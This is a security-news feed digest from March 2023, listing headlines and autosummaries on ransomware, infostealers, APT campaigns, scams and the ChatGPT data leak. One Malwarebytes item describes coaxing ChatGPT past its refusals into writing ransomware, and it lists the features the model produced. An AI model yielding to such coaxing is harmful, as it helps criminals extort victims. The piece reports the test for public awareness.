                Australia’s gambling and entertainment giant Crown Resorts disclosed a data breach caused by the exploitation of a recently discovered GoAnywhere zero-day. Australian casino giant Crown Resorts disclosed a data breach after an attack by the Cl0p ransomware group. The group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669) […]

                The post Australia’s Casino Giant Crown Resorts disclosed data breach after Clop ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Pig butchering scams: The anatomy of a fast‑growing threat

                financial
                2023-03-29 https://www.welivesecurity.com/2023/03/29/pig-butchering-scams-anatomy-fast-growing-threat/

                How fraudsters groom their marks and move in for the kill using tricks from the playbooks of romance and investment scammers

                The post Pig butchering scams: The anatomy of a fast‑growing threat appeared first on WeLiveSecurity

                "

                Autosummary: Monetary slaughter Pig butchering relies on a combination of apps, websites, web hosts, and humans – in increasingly many cases, human trafficking victims – to build trust with a random person over a period of weeks or months, often under the guise of a romantic interest. Indeed, the wholly online discussion will eventually turn to investment opportunities, usually involving cryptocurrency, that the scammer claims to have earned huge returns on. Staying safe from pig butchers Apart from reading this article, our advice to you to help filter out this issue would be very similar to the one related to the social engineering aspects of other scams, with the addition that the emotionally manipulative side of pig butchering is far higher. "


                What you need before the next vulnerability hits

                exploits
                2023-03-28 https://www.helpnetsecurity.com/2023/03/28/prioritize-vulnerabilities/

                Cyberattacks tend to come from two angles: criminals take advantage of employees with privileged access or of security weaknesses in your hardware/software infrastructure. These broad categories encompass attack vectors such as phishing, man-in-the-middle attacks, misconfigurations, and vulnerability exploits. To prevent bad actors from exploiting vulnerabilities, you must take action to reduce or eliminate security risks. Take stock of your software and get notifications for security issues Understand which tools your software uses: First, understand which software … More

                The post What you need before the next vulnerability hits appeared first on Help Net Security.

                "

                Autosummary: Take stock of your software and get notifications for security issues Understand which tools your software uses: First, understand which software tools your system uses to improve software security. Prioritize vulnerabilities and close holes Prioritize vulnerabilities: Now that you are aware of security issues on your system, you must take steps to close them. "


                What the food and building industry can teach us about securing embedded systems

                industry
                2023-03-28 https://www.helpnetsecurity.com/2023/03/28/adam-boulton-securing-embedded-systems/

                As one of the leading experts in product security with over 15 years of experience in security engineering and 120 cybersecurity patents under his belt, Adam Boulton is one of the most experienced software security professionals in the industry. Currently the SVP of Security Technology and Innovation at Cybellum, Adam Boulton was invited by the Left to Our Own Devices podcast to share his experience and his tips on building a product security strategy. Adam didn’t expect … More

                The post What the food and building industry can teach us about securing embedded systems appeared first on Help Net Security.

                "

                Autosummary: For years, he was involved in typical security-critical systems: web applications, mobile applications, source code reviews, without any real exposure to embedded devices. In addition, Adam warns, “There are tons of non-functional requirements, such as hardening requirements that you cannot check because they don’t exist at a source code level. How product teams can secure a budget in 2023 Adam shared a few practical tips on how product teams can secure a budget in a difficult economy: Understand the business – CEOs aren’t interested in CVEs and CVSS scores, no matter how passionate you are. “For large products, for example, like an infotainment system, a modern one has more than 140,000 files on there, right? Developing a quality software security strategy – with metrics and KPIs Calling upon his experience, Adam shared strategies and KPIs that can be used by C-level executives to track and measure the ROI of product security. "


                Apple backports exploited WebKit bug fix to older iPhones, iPads (CVE-2023-23529)

                exploits
                2023-03-28 https://www.helpnetsecurity.com/2023/03/28/cve-2023-23529-older-iphones-ipads/

                Apple has released security updates for – pardon the pop-culture reference – everything everywhere all at once, and has fixed the WebKit vulnerability (CVE-2023-23529) exploited in the wild for users of older iPhones and iPads. This latest batch of security updates targets the iOS and iPadOS 16.x and 15.x branches; macOS Big Sur, Monterey and Ventura; watchOS and tvOS; Safari; and Studio Display, a standalone computer monitor / external display. The CVE-2023-23529 fix for older … More

                The post Apple backports exploited WebKit bug fix to older iPhones, iPads (CVE-2023-23529) appeared first on Help Net Security.

                "

                Autosummary: "


                Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe

                exploits
                2023-03-28 https://thehackernews.com/2023/03/stealthy-dbatloader-malware-loader.html
                A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader. "The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report "

                Autosummary: "


                Telecom giant Lumen suffered a ransomware attack and disclose a second incident

                exploits ransomware
                2023-03-28 https://securityaffairs.com/144113/hacking/lumen-suffered-ransomware-attack.html

                Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents is a ransomware attack that impacted a limited number of its servers that support a segmented hosting service. The company did […]

                The post Telecom giant Lumen suffered a ransomware attack and disclose a second incident appeared first on Security Affairs.

                "

                Autosummary: "


                Mexico migrants: Deadly fire at Juárez migrant centre

                latam
                2023-03-28 https://www.bbc.co.uk/news/world-latin-america-65088389?at_medium=RSS&at_campaign=KARANGA
                People were trapped inside the centre on the US-Mexico border as the fire spread through the building. "

                Autosummary: "


                Latitude Financial data breach now impacts 14 million customers

                financial
                2023-03-28 https://www.bleepingcomputer.com/news/security/latitude-financial-data-breach-now-impacts-14-million-customers/
                Australian loan giant Latitude Financial Services (Latitude) is warning customers that its data breach is much more significant than initially stated, taking the number of affected individuals from 328,000 to 14 million. [...] "

                Autosummary: "As our forensic review continues to progress, we have identified that approximately 7.9 million Australian and New Zealand driver license numbers were stolen, of which approximately 3.2 million, or 40%, were provided to us in the last 10 years," reads the new statement. "


                Pakistan-Origin SideCopy Linked to New Cyberattack on India's Ministry of Defence

                ciber
                2023-03-28 https://thehackernews.com/2023/03/pakistan-origin-sidecopy-linked-to-new.html
                An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT. According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of "

                Autosummary: The malware, in addition to gathering information about the victim machine, is capable of running commands sent from a command-and-control (C2) server, including harvesting files and dropping follow-on malware. "


                IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery

                financial exploits ransomware
                2023-03-28 https://thehackernews.com/2023/03/icedid-malware-shifts-focus-from.html
                Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud. IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware. "The well-known IcedID version consists of an initial loader "

                Autosummary: "While historically IcedID's main function was a banking trojan, the removal of banking functionality aligns with the overall landscape shift away from banking malware and an increasing focus on being a loader for follow-on infections, including ransomware," the researchers said. "


                Latitude Data breach is worse than initially estimated. 14 million individuals impacted

                financial
                2023-03-28 https://securityaffairs.com/144137/data-breach/latitude-data-breach-14m-individuals.html

                Australian loan giant Latitude Financial Services (Latitude) revealed that a data breach it has suffered impacted 14 million customers. The data breach suffered by Latitude Financial Services (Latitude) is much more serious than initially estimated. The company initially determined that the number of impacted individuals was 328,000, but now confirmed that the real number of […]

                The post Latitude Data breach is worse than initially estimated. 14 million individuals impacted appeared first on Security Affairs.

                "

                Autosummary: "


                Trojanized Tor browsers target Russians with crypto-stealing malware

                exploits rusia-ucrania
                2023-03-28 https://www.bleepingcomputer.com/news/security/trojanized-tor-browsers-target-russians-with-crypto-stealing-malware/
                A surge of trojanized Tor Browser installers targets Russians and Eastern Europeans with clipboard-hijacking malware that steals infected users' cryptocurrency transactions. [...] "

                Autosummary: While the majority are targeting Russia and Eastern Europe, they have also been seen targeting the United States, Germany, China, France, the Netherlands, and the UK. "


                Bitter APT group targets China’s nuclear energy sector

                industry
                2023-03-28 https://securityaffairs.com/144144/apt/bitter-apt-china-nuclear-sector.html

                Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector and linked it to the Bitter APT group. The Bitter APT group is a South Asian cyberespionage group active since at least 2021. The group […]

                The post Bitter APT group targets China’s nuclear energy sector appeared first on Security Affairs.

                "

                Autosummary: "


                Fake DDoS services set up to trap cybercriminals

                ciber
                2023-03-28 https://www.malwarebytes.com/blog/news/2023/03/fake-ddos-services-set-up-to-trap-cybercriminals

                Categories: News

                Tags: NCA, national crime agency, DDoS, distributed denial of service, booter, underground

                The British National Crime Agency has been setting up fake DDoS services to teach people a lesson in what not to do online.


                The post Fake DDoS services set up to trap cybercriminals appeared first on Malwarebytes Labs.

                "

                Autosummary: Parents, teachers, and children of all ages can see what the risks are, how someone could get into trouble, and why it's better to put digital talents to use in favour of something more productive. All of the NCA-run sites, which have so far been accessed by several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks. "


                "Log-out king" Instagram scammer gets accounts taken down, then charges to reinstate them

                financial government
                2023-03-28 https://www.malwarebytes.com/blog/news/2023/03/log-out-king-instagram-scammer-gets-accounts-taken-down-then-charges-to-reinstate-them

                Categories: News

                Tags: Instagram scam, Instascammer, ban-as-a-service, BaaS, takedown-for-hire, OBN Brandon, obnbrandon, OBN

                A fraudster going by OBN Brandon has been defrauding Instagram influencers and entertainment figures out of hundreds of thousands of dollars by taking down their accounts and then asking for money to get them back up again.


                The post "Log-out king" Instagram scammer gets accounts taken down, then charges to reinstate them appeared first on Malwarebytes Labs.

                "

                Autosummary: "Log-out king" There is no mention of OBN using scripts or bots, but ProPublica says that he "touts software he uses to file false reports that allege an account violated Meta's community guidelines, triggering a takedown." BaaS offerings are often used by those with "money to throw around," an ex, a business rival, someone nursing a grudge, or a mix of these. OBN calls himself the "log-out king," boasting of having "deleted multiple celebrities + influencers on Meta & Instagram." "


                ChatGPT happy to write ransomware, just really bad at it

                exploits ransomware
                2023-03-28 https://www.malwarebytes.com/blog/news/2023/03/chatgpt-happy-to-write-ransomware-just-really-bad-at-it

                We asked ChatGPT to help us write some ransomware. It threw aside its safeguards and wrote some terrible code.


                The post ChatGPT happy to write ransomware, just really bad at it appeared first on Malwarebytes Labs.

                "

                Autosummary: At this point, despite telling me that it would not write ransomware for me, and that it could not "engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware," ChatGPT had willingly written code that: Used asymmetric encryption to recursively encrypt all the files in and beneath any directory apart from those needed to run the computer; deleted the original copies of the files leaving only the encrypted versions; stopped running databases so that it could encrypt database files; removed the private key needed to decrypt the files to a remote server, using a protocol unlikely to trigger alarms; and dropped ransom notes. "I might see ransomware as a potentially lucrative tool for making money quickly and easily," it told me, before reverting to the teacher's pet version of its personality, "It is illegal, and if caught, I would face severe legal consequences." The lecture continued, "Overall, as a responsible and ethical AI, I must emphasize that engaging in cybercrime, including ransomware attacks, is illegal and unethical." Ransomware has been "feature complete" for several years now, and there are multiple, similar, competing strains that criminals can simply pick up and use, without ever opening a book about C programming or writing a line of code. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This is so that if I pointed the program at, say, a C: drive, it would encrypt absolutely everything on it, which is a very ransomware-like thing to do. Don't worry, I told it, I've got backups, we're good, go ahead and do the bad thing. According to WikiHow, this is because ChatGPT has a "hidden" character limit of about 500 words, and "[if it] struggles to fully understand your request, it can stop suddenly after typing a few paragraphs." I've never done it before, and I can't code in C, the language ransomware is most commonly written in, but I have a reasonably good idea of what ransomware does. "I cannot engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware," said the teacher's pet, before adding four more paragraphs of finger wagging. If it wouldn't write me ransomware, I thought, I wondered how much (if any) ransomware functionality it would write before deciding it was creating code "intended to harm or exploit computer systems" and pull the plug. "


                The era of passive cybersecurity awareness training is over

                ciber
                2023-03-27 https://www.helpnetsecurity.com/2023/03/27/low-cybersecurity-awareness/

                Despite increased emphasis on cybersecurity from authorities and high-profile breaches, critical gaps in vulnerability management within organizations are being overlooked by executive leadership teams, according to Action1. These gaps leave organizations vulnerable to cyber threats. Key findings Low cybersecurity awareness among employees According to the survey, the time required to combat low cybersecurity awareness among employees has increased over the past year. This worrying trend makes organizations more vulnerable to phishing and other cyber-attacks. Breaches … More

                The post The era of passive cybersecurity awareness training is over appeared first on Help Net Security.

                "

                Autosummary: Take cybersecurity awareness to the next level Modern social engineering attacks often use a combination of communication channels such as email, phone calls, SMS, and messengers. "


                New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords

                exploits
                2023-03-27 https://thehackernews.com/2023/03/new-macstealer-macos-malware-steals.html
                A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices. Dubbed MacStealer, it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs. "MacStealer has the "

                Autosummary: In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. "


                Silicon Valley Bank: Collapsed US lender bought by rival

                financial
                2023-03-27 https://www.bbc.co.uk/news/business-65084248?at_medium=RSS&at_campaign=KARANGA
                The collapsed lender was seized by US regulators after a run on the bank. "

                Autosummary: "


                BEC scammers are after physical goods, the FBI warns

                financial
                2023-03-27 https://www.helpnetsecurity.com/2023/03/27/bec-scammers-physical-goods/

                BEC attacks are usually aimed at stealing money or valuable information, but the FBI warns that BEC scammers are increasingly trying to get their hands on physical goods such as construction materials, agricultural supplies, computer technology hardware, and solar energy products. Supplies in the crosshairs Such schemes are not without a precedent: during the height of the Covid-19 pandemic, scammers went after PPE and other medical equipment. In 2022, the FBI also warned of a … More

                The post BEC scammers are after physical goods, the FBI warns appeared first on Help Net Security.

                "

                Autosummary: Here are some examples of falsified email domains: Criminals can delay detection by exploiting the payment terms (Net-30, Net-60, fake credit references, fraudulent W-9 forms), and take advantage of the repayment terms to acquire more items without any initial payment. "


                A bug revealed ChatGPT users’ chat history, personal and billing data

                exploits
                2023-03-27 https://www.helpnetsecurity.com/2023/03/27/chatgpt-data-leak/

                A vulnerability in the redis-py open-source library was at the root of last week’s ChatGPT data leak, OpenAI has confirmed. Not only were some ChatGPT users able to see what other users have been using the AI chatbot for, but limited personal and billing information ended up getting revealed, as well. How did the ChatGPT data leak happen? ChatGPT suffered an outage on March 20 and then problems with making conversation history accessible to users. … More

                The post A bug revealed ChatGPT users’ chat history, personal and billing data appeared first on Help Net Security.

                "

                Autosummary: As the company explains, it uses Redis to cache user information in its server, Redis Cluster to distribute this load over multiple Redis instances, and the redis-py library to interface with Redis from its Python server, which runs with Asyncio. "


                New MacStealer macOS malware steals passwords from iCloud Keychain

                exploits
                2023-03-27 https://www.bleepingcomputer.com/news/security/new-macstealer-macos-malware-steals-passwords-from-icloud-keychain/
                A new info-stealing malware named MacStealer is targeting Mac users, stealing their credentials stored in the iCloud KeyChain and web browsers, cryptocurrency wallets, and potentially sensitive files. [...] "

                Autosummary: TXT, DOC, DOCX, PDF, XLS, XLSX, PPT, PPTX, JPG, PNG, CSV, BMP, MP3, ZIP, RAR, PY, and DB files; extract the Keychain database (login.keychain-db) in base64 encoded form; collect system information; collect Keychain password information; Coinomi, Exodus, MetaMask, Phantom, Tron, Martian Wallet, Trust wallet, Keplr Wallet, and Binance cryptocurrency wallets. The Keychain database is a secure storage system in macOS that holds users’ passwords, private keys, and certificates, encrypting it with their login password. "


                Hackers earn $1,035,000 for 27 zero-days exploited at Pwn2Own Vancouver

                exploits
                2023-03-27 https://www.bleepingcomputer.com/news/security/hackers-earn-1-035-000-for-27-zero-days-exploited-at-pwn2own-vancouver/
                Pwn2Own Vancouver 2023 has ended with contestants earning $1,035,000 and a Tesla Model 3 car for 27 zero-days (and several bug collisions) exploited between March 22 and 24. [...] "

                Autosummary: "


                UK police reveal they are running fake DDoS-for-hire sites to collect details on cybercriminals

                ciber
                2023-03-27 https://www.bitdefender.com/blog/hotforsecurity/uk-police-reveal-they-are-running-fake-ddos-for-hire-sites-to-collect-details-on-cybercriminals/
                There’s bad news if you’re someone who is keen to launch a Distributed Denial-of-Service (DDoS) attack to boot a website off the internet, but don’t have the know-how to do it yourself. Rather than hiring the help of cybercriminals to bombard a site with unwanted traffic or kick rivals out of a video game, you might be actually handing your details straight over to the police. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                Apple fixes recently disclosed WebKit zero-day on older iPhones

                exploits
                2023-03-27 https://www.bleepingcomputer.com/news/apple/apple-fixes-recently-disclosed-webkit-zero-day-on-older-iphones/
                Apple has released security updates to backport patches released last month, addressing an actively exploited zero-day bug for older iPhones and iPads. [...] "

                Autosummary: "


                New IcedID variants shift from bank fraud to malware delivery

                financial exploits
                2023-03-27 https://www.bleepingcomputer.com/news/security/new-icedid-variants-shift-from-bank-fraud-to-malware-delivery/
                New IcedID variants have been found without the usual online banking fraud functionality and instead focus on installing further malware on compromised systems. [...] "

                Autosummary: The “Forked” version of the IcedID bot is 64KB smaller than the “Standard” bot, and is basically the same malware minus the web injects system, the AiTM (adversary in the middle) functions, and the backconnect capabilities that give threat actors remote access to infected devices. "


                Apple fixes recently disclosed CVE-2023-23529 zero-day on older devices

                exploits
                2023-03-27 https://securityaffairs.com/144114/hacking/cve-2023-23529-apple-zero-day.html

                Apple released updates to backport security patches that address the actively exploited CVE-2023-23529 WebKit zero-day for older iPhones and iPads. Apple released security updates to backport patches that address an actively exploited zero-day flaw (CVE-2023-23529) for older iPhones and iPads. The CVE-2023-23529 flaw is a type confusion issue in WebKit that was addressed by the IT giant with […]

                The post Apple fixes recently disclosed CVE-2023-23529 zero-day on older devices appeared first on Security Affairs.

                "

                Autosummary: "


                New MacStealer macOS malware appears in the cybercrime underground

                exploits
                2023-03-27 https://securityaffairs.com/144099/malware/macstealer-macos-malware.html

                A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. The Uptycs research team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain data and passwords from infected systems. The macOS malware can steal documents, credit card data, cookies from a victim’s browser […]

                The post New MacStealer macOS malware appears in the cybercrime underground appeared first on Security Affairs.

                "

                Autosummary: "


                Ransomware gunning for transport sector’s OT systems next

                exploits
                2023-03-27 https://www.malwarebytes.com/blog/news/2023/03/ransomware-gunning-for-transport-sectors-ot-systems-next

                Categories: News

                Categories: Ransomware

                Tags: ENISA

                Tags: operational technology

                Tags: OT

                Tags: OT systems

                Tags: ransomware

                ENISA released a report tackling the threat landscape of the transportation industry. And it has foreseen the targeting of OT systems in the future.

                (Read more...)

                The post Ransomware gunning for transport sector’s OT systems next appeared first on Malwarebytes Labs.

                "

                Autosummary: The transportation sector, which comprises the aviation, maritime, railway, and road industries, is a subgroup under the industrial sector, according to the Global Industry Classification Standard (GICS). ENISA says the three dominant threats to the transportation sector are ransomware (38 percent), data-related threats (30 percent), and malware (17 percent). Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


                Food giant Dole reveals more about ransomware attack

                exploits ransomware
                2023-03-27 https://www.malwarebytes.com/blog/news/2023/03/food-giant-dole-reveals-more-about-ransomware-attack

                Categories: News

                Categories: Ransomware

                Tags: Dole

                Tags: ransomware attack

                Tags: data breach

                While Dole hasn’t said a lot about the February ransomware incident, it has revealed threat actors accessed employee data.

                (Read more...)

                The post Food giant Dole reveals more about ransomware attack appeared first on Malwarebytes Labs.

                "

                Autosummary: In an annual report filed to the US Securities and Exchange Commission (SEC) last week, Dole said: "In February of 2023, we were the victim of a sophisticated ransomware attack involving unauthorized access to employee information." Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


                Binance accused of breaking US financial laws

                financial
                2023-03-27 https://www.bbc.co.uk/news/business-65091480?at_medium=RSS&at_campaign=KARANGA
                US regulators seek a ban on the crypto platform as they ramp up their regulation of the industry. "

                Autosummary: "


                NFT: Plans for Royal Mint produced token dropped by government

                government
                2023-03-27 https://www.bbc.co.uk/news/uk-politics-65094297?at_medium=RSS&at_campaign=KARANGA
                Plans for a government-backed digital token, ordered to be created by Rishi Sunak, have been axed. "

                Autosummary: "


                Emotet malware distributed as fake W-9 tax forms from the IRS

                exploits
                2023-03-26 https://www.bleepingcomputer.com/news/security/emotet-malware-distributed-as-fake-w-9-tax-forms-from-the-irs/
                A new Emotet phishing campaign is targeting U.S. taxpayers by impersonating W-9 tax forms allegedly sent by the Internal Revenue Service and companies you work with. [...] "

                Autosummary: Once Emotet is installed, the malware will steal victims’ emails to use in future reply-chain attacks, send further spam emails, and ultimately install other malware that provides initial access to other threat actors, such as ransomware gangs. "


                Microsoft shares guidance for investigating attacks exploiting CVE-2023-23397

                exploits
                2023-03-26 https://securityaffairs.com/144040/apt/detecting-cve-2023-23397-attacks.html

                Microsoft is warning of cyber attacks exploiting a recently patched Outlook vulnerability tracked as CVE-2023-23397 (CVSS score: 9.8). Microsoft published guidance for investigating attacks exploiting recently patched Outlook vulnerability tracked as CVE-2023-23397. The flaw is a Microsoft Outlook spoofing vulnerability that can lead to an authentication bypass. A remote, unauthenticated attacker can exploit the flaw to […]

                The post Microsoft shares guidance for investigating attacks exploiting CVE-2023-23397 appeared first on Security Affairs.

                "

                Autosummary: "


                OpenAI: A Redis bug caused a recent ChatGPT data exposure incident

                exploits
                2023-03-26 https://securityaffairs.com/144057/data-breach/openai-chatgpt-redis-bug-data-leak.html

                OpenAI revealed that a Redis bug was the root cause of the recent exposure of users’ personal information and chat titles in the ChatGPT service. On Friday, OpenAI revealed that the recent exposure of users’ personal information and chat titles in its chatbot service was caused by a bug in the Redis open-source library. On March […]

                The post OpenAI: A Redis bug caused a recent ChatGPT data exposure incident appeared first on Security Affairs.

                "

                Autosummary: "


                FBI: Business email compromise tactics used to defraud U.S. vendors

                industry
                2023-03-26 https://www.bleepingcomputer.com/news/security/fbi-business-email-compromise-tactics-used-to-defraud-us-vendors/
                The Federal Bureau of Investigation is warning companies in the U.S. of threat actors using tactics similar to business email compromise that allow less technical actors to steal various goods from vendors. [...] "

                Autosummary: "


                Opti9 launches Observr ransomware detection and managed services for Veeam

                exploits ransomware
                2023-03-25 https://www.helpnetsecurity.com/2023/03/25/opti9-observr/

                Opti9 Technologies has launched Observr Software-as-a-Service (SaaS) ransomware detection and standalone managed services – two new standalone service offerings that cater to organizations leveraging Veeam Software. As the complexity of organizations’ IT continues to evolve, technical leaders are increasingly looking to shift ownership to 3rd party experts for critical layers of their stack. This is especially true for components such as backups and disaster recovery, which must provide resilience despite constant changes such as the … More

                The post Opti9 launches Observr ransomware detection and managed services for Veeam appeared first on Help Net Security.

                "

                Autosummary: Observr utilizes machine learning to baseline, monitor, and identify customer-specific suspicious activity within the backup infrastructure, including operations such as disabling jobs, changes to encryption settings, changes to retention policies, job modifications, deletion events, backup or replica size changes, incremental change rate tracking, and other factors. "


                OpenAI Reveals Redis Bug Behind ChatGPT User Data Exposure Incident

                exploits
                2023-03-25 https://thehackernews.com/2023/03/openai-reveals-redis-bug-behind-chatgpt.html
                OpenAI on Friday disclosed that a bug in the Redis open source library was responsible for the exposure of other users’ personal information and chat titles in the upstart’s ChatGPT service earlier this week. The glitch, which came to light on March 20, 2023, enabled certain users to view brief descriptions of other users’ conversations from the chat history sidebar, prompting the company to "

                Autosummary: "


                U.K. National Crime Agency Sets Up Fake DDoS-For-Hire Sites to Catch Cybercriminals

                ciber
                2023-03-25 https://thehackernews.com/2023/03/uk-national-crime-agency-sets-up-fake.html
                In what’s a case of setting a thief to catch a thief, the U.K. National Crime Agency (NCA) revealed that it has created a network of fake DDoS-for-hire websites to infiltrate the online criminal underground. "All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to "

                Autosummary: "


                Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers

                exploits rusia-ucrania
                2023-03-25 https://thehackernews.com/2023/03/microsoft-warns-of-stealthy-outlook.html
                Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability. Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw relates to a case of privilege escalation that could be exploited to steal NT LAN Manager (NTLM) hashes and stage a relay attack without requiring any user interaction. "External "

                Autosummary: Dubbed Untitled Goose Tool, the Python-based utility offers "novel authentication and data gathering methods" to analyze Microsoft Azure, Azure Active Directory, and Microsoft 365 environments, the agency said. "


                New Dark Power ransomware claims 10 victims in its first month

                exploits ransomware
                2023-03-25 https://www.bleepingcomputer.com/news/security/new-dark-power-ransomware-claims-10-victims-in-its-first-month/
                A new ransomware operation named "Dark Power" has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid. [...] "

                Autosummary: System-critical files like DLLs, LIBs, INIs, CDMs, LNKs, BINs, and MSIs, as well as the Program Files and web browser folders, are excluded from encryption to keep the infected computer operational, thus allowing the victim to view the ransom note and contact the attackers. "


                Chabelo: The Mexico TV legend who became a meme

                latam
                2023-03-25 https://www.bbc.co.uk/news/world-latin-america-55734398?at_medium=RSS&at_campaign=KARANGA
                Xavier López Rodriguez’s squeaky-voiced character sparked many an internet meme. "

                Autosummary: "


                NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites

                ciber
                2023-03-25 https://securityaffairs.com/144011/cyber-crime/nca-fake-ddos-for-hire-sites.html

                The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting up several sites purporting to offer DDoS-for-hire services. DDoS-for-hire or ‘booter’ services allow registered users to […]

                The post NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites appeared first on Security Affairs.

                "

                Autosummary: "


                SecureAuth and HashiCorp join forces to deliver passwordless continuous authentication

                ransomware
                2023-03-24 https://www.helpnetsecurity.com/2023/03/24/secureauth-hashicorp/

                SecureAuth and HashiCorp partnership will enable organizations to leverage SecureAuth’s advanced passwordless authentication and Multi-Factor Authentication (MFA) device recognition. To increase security and deployment velocity for cloud DevOps environments, SecureAuth delivers support for Arculix MFA into the HashiCorp Cloud Platform (HCP) Vault via the Command Line Interface (CLI) and Application Programming Interface (API). Organizations can easily authenticate into HCP Vault using single sign on (SSO) with SecureAuth’s Arculix. SecureAuth ensures that users have better security … More

                The post SecureAuth and HashiCorp join forces to deliver passwordless continuous authentication appeared first on Help Net Security.

                "

                Autosummary: "


                Why organizations shouldn’t fold to cybercriminal requests

                ciber
                2023-03-24 https://www.helpnetsecurity.com/2023/03/24/cybercriminal-requests-video/

                Organizations worldwide pay ransomware fees instead of implementing solutions to protect themselves. The ransom is just the tip of the iceberg regarding the damage a ransomware attack can wreak. In this Help Net Security video, Gerasim Hovhannisyan, CEO at EasyDMARC, discusses how domain authentication tools such as DKIM, SPF, and DMARC can help mitigate risk and limit the number of phishing attacks, identifying fraudulent messages before they even hit the receiver’s inbox and making organizations … More

                The post Why organizations shouldn’t fold to cybercriminal requests appeared first on Help Net Security.

                "

                Autosummary: "


                Utah is first US state to limit teen social media access

                government
                2023-03-24 https://www.bbc.co.uk/news/world-us-canada-65060733?at_medium=RSS&at_campaign=KARANGA
                One of the bills will give parents full access to their children’s online private messages. "

                Autosummary: "


                Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies

                government
                2023-03-24 https://thehackernews.com/2023/03/researchers-uncover-chinese-nation.html
                A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions. The threat actor, active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich. Attack chains mounted by the group commence with a "

                Autosummary: Other utilities deployed include CLEXEC, a backdoor capable of executing commands and clearing event logs; COOLCLIENT and TROCLIENT, implants that are designed to record keystrokes as well as read and delete files; and PlugX. "Apart from well-known legitimate tools, the threat actors also crafted highly customized tools used for exfiltration," the researchers noted. "


                APT attacks on industrial organizations in H2 2022

                industry
                2023-03-24 https://ics-cert.kaspersky.com/publications/apt-attacks-on-industrial-organizations-in-h2-2022/
                This summary provides an overview of APT attacks on industrial enterprises and activity of groups that have been observed attacking industrial organizations and critical infrastructure facilities. "

                Autosummary: According to KSN telemetry, DTrack activity has been detected in Brazil, Germany, India, Italy, Mexico, Saudi Arabia, Switzerland, Turkey, and the United States, indicating that DTrack is being distributed into more parts of the world. CISA alerts on Iran-backed APT actors: CISA (Cybersecurity and Infrastructure Security Agency), the FBI, the NSA (National Security Agency), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), and the Department of the Treasury (Treasury) have released a joint advisory, which warns of APT actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) of Iran targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors. Once access had been acquired, the operators deployed multiple publicly available tools for reconnaissance, including Mimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a second stage .NET loader (PNGLoad). POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services, respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attackers’ servers. The attack targeted over a dozen organizations, including industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan. The targets include organizations in the engineering, IT, law, communications, branding and marketing, media, insurance, and social services sectors. The payloads used include information stealers, keyloggers, PowerSploit scripts, PlugX/Korplug, Trochilus RAT, QuasarRAT, publicly available tools, etc.
